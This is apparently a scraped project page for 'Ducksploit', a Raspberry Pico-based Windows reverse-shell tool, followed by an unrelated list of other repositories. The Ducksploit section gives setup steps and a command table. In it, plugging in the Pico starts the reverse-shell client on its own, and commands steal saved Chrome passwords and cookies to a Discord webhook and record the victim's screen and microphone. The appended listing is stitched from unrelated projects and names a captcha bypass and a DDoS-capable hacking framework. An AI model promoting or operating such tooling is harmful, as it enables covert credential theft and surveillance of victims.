DUCKSPLOIT - Windows Hacking FrameWork using Reverse Shell

Overview

banner

Ducksploit

Install Ducksploit

Hacker

setup raspberry pico
  1. Download https://github.com/DuckpvpTeam/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in PICO SETUP folder
  4. Plugg your raspberry pico on your PC with the BOOTSEL button picobootbutton
  5. Move CircuitPython.uf2 file in the E:\ usb port (port of your pico) now your raspberry pico gonna leave usb port and reconnec with CIRCUITPY name
  6. Erase all the content of your raspberry pico and copy 'copy' folder into him
  7. Write myip.txt and write your own IP
  8. Now your raspberry pico is full configured , unplugg your pico and done!
setup ducksploit commands
  1. Download https://github.com/canarddu38/DUCKSPLOIT/archive/root.zip
  2. Extract downloaded zip file
  3. Go in SERVER folder
  4. If python is not installed, launch 'installpython.bat' or download at https://www.python.org/ftp/python/3.8.0/python-3.8.0.exe
  5. Install python requirements using 'installrequirements.bat' script
  6. launch setup.bat ###MUST BE RUN AS ADMINISTRATOR###
  7. Ducksploit is now installed on your PC 😄
  8. Type 'ducksploit' in the cmd
  9. Config your ip using 'ipconfig' (your ip)
  10. Wait victim's connection using 'wait' command
  11. Have fun with ducksploit hacking commands (type help to get commands list)

Victim

Just plugg the raspberry pico in your pc (or hacker can do also) That will start automaticaly the client of the reverse shell

⚠️ Ducksploit is made for legal use or educational use ⚠️

Uninstall Ducksploit

  1. type 'ds uninstall' in cmd
  2. Done 😄

SUPPORT

Donate 👍 using Paypal

Commands

Launch

Command Usage Result
wait wait wait your victim's connection

Config

Command Usage Result
ipconfig ipconfig (your ipv4) config your ip

Account

Command Usage Result
register register reconfigure your account
accountinfo accountinfo view all your account's infos

Exploits

Command Usage Result
stealpwds stealpwds (discord webhook url) steal all saved chrome passwords of your victim and send them into a discord webhook
stealcookies stealcookies (discord webhook url) steal all saved chrome cookies of your victim and send them into a discord webhook
open open (applicationname.exe) open mensioned application
recordscreen recordscreen (time in second) record victim's screen durring amount of time
recordmicro recordmicro (time in second) record victim's micro durring amount of time

Mouse

Command Usage Result
mouseclick mouseclick [left, right, middle] make the victim click the mensionned button
mousemove mousemove (x) (y) move the victim's cursor by x and y pixels
mousescroll mousescroll (int between -1000 and 1000) make the user scroll by int pixels
locatemouse locatemouse get the victim's cursor current locations

Alert Window

Command Usage Result
msg msg [-file, -text] (title) (line1) (line2) create an alertbox and send it on the vitim's pc with a title and 2 lines (if -file set line1 to createfile command content)
createfile createfile (text) set the content of line1 of msg command

Troll

Command Usage Result
skull skull spam cmds with skull and crossbones

Mysc

Command Usage Result
uninstall uninstall uninstall ducksploit
update update update ducksploit
credits credits view ducksploit's credits
exit exit exit from the ducksploit treminal
help help getting the list of all commands
shutdown shutdown make the victim's pc shutdown
reboot reboot make the victim's pc reboot
closesession closesesion make the victim's session close
Owner
We're smart developers , and we work on Windows & android :+1: (DUCKSPLOIT is comming... :hourglass_flowing_sand: )
Fail tests that take too long to run

GitHub | PyPI | Issues pytest-fail-slow is a pytest plugin for making tests fail that take too long to run. It adds a --fail-slow DURATION command-lin

John T. Wodder II 4 Nov 27, 2022
Language-agnostic HTTP API Testing Tool

Dredd — HTTP API Testing Framework Dredd is a language-agnostic command-line tool for validating API description document against backend implementati

Apiary 4k Jan 05, 2023
d4rk Ghost is all in one hacking framework For red team Pentesting

d4rk ghost is all in one Hacking framework For red team Pentesting it contains all modules , information_gathering exploitation + vulnerability scanning + ddos attacks with 12 methods + proxy scraper

d4rk sh4d0w 15 Dec 15, 2022
A simple asynchronous TCP/IP Connect Port Scanner in Python 3

Python 3 Asynchronous TCP/IP Connect Port Scanner A simple pure-Python TCP Connect port scanner. This application leverages the use of Python's Standa

70 Jan 03, 2023
The pytest framework makes it easy to write small tests, yet scales to support complex functional testing

The pytest framework makes it easy to write small tests, yet scales to support complex functional testing for applications and libraries. An example o

pytest-dev 9.6k Jan 02, 2023
Find index entries in $INDEX_ALLOCATION attributes

INDXRipper Find index entries in $INDEX_ALLOCATION attributes Timeline created using mactime.pl on the combined output of INDXRipper and fls. See: sle

32 Nov 05, 2022
Python selenium script to bypass simaster.ugm.ac.id weak captcha.

Python selenium script to bypass simaster.ugm.ac.id weak "captcha".

Hafidh R K 1 Feb 01, 2022
Docker-based integration tests

Docker-based integration tests Description Simple pytest fixtures that help you write integration tests with Docker and docker-compose. Specify all ne

Avast 326 Dec 27, 2022
Sixpack is a language-agnostic a/b-testing framework

Sixpack Sixpack is a framework to enable A/B testing across multiple programming languages. It does this by exposing a simple API for client libraries

1.7k Dec 24, 2022
XSSearch - A comprehensive reflected XSS tool built on selenium framework in python

XSSearch A Comprehensive Reflected XSS Scanner XSSearch is a comprehensive refle

Sathyaprakash Sahoo 49 Oct 18, 2022
To automate the generation and validation tests of COSE/CBOR Codes and it's base45/2D Code representations

To automate the generation and validation tests of COSE/CBOR Codes and it's base45/2D Code representations, a lot of data has to be collected to ensure the variance of the tests. This respository was

160 Jul 25, 2022
WrightEagle AutoTest (Has been updated by Cyrus team members)

Autotest2d WrightEagle AutoTest (Has been updated by Cyrus team members) Thanks go to WrightEagle Members. Steps 1- prepare start_team file. In this s

Cyrus Soccer Simulation 2D Team 3 Sep 01, 2022
Nokia SR OS automation

Nokia SR OS automation Nokia is one of the biggest vendors of the telecommunication equipment, which is very popular in the Service Provider segment.

Karneliuk.com 7 Jul 23, 2022
A test fixtures replacement for Python

factory_boy factory_boy is a fixtures replacement based on thoughtbot's factory_bot. As a fixtures replacement tool, it aims to replace static, hard t

FactoryBoy project 3k Jan 05, 2023
A simple script to login into twitter using Selenium in python.

Quick Talk A simple script to login into twitter using Selenium in python. I was looking for a way to login into twitter using Selenium in python. Sin

Lzy-slh 4 Nov 20, 2022
A configurable set of panels that display various debug information about the current request/response.

Django Debug Toolbar The Django Debug Toolbar is a configurable set of panels that display various debug information about the current request/respons

Jazzband 7.3k Jan 02, 2023
Plugin for generating HTML reports for pytest results

pytest-html pytest-html is a plugin for pytest that generates a HTML report for test results. Resources Documentation Release Notes Issue Tracker Code

pytest-dev 548 Dec 28, 2022
pytest plugin that let you automate actions and assertions with test metrics reporting executing plain YAML files

pytest-play pytest-play is a codeless, generic, pluggable and extensible automation tool, not necessarily test automation only, based on the fantastic

pytest-dev 67 Dec 01, 2022
Automates hiketop+ crystal earning using python and appium

hikepy Works on poco x3 idk about your device deponds on resolution Prerquests Android sdk java adb Setup Go to https://appium.io/ Download and instal

4 Aug 26, 2022
A small faсade for the standard python mocker library to make it user-friendly

unittest-mocker Inspired by the pytest-mock, but written from scratch for using with unittest and convenient tool - patch_class Installation pip insta

Vertliba V.V. 6 Jun 10, 2022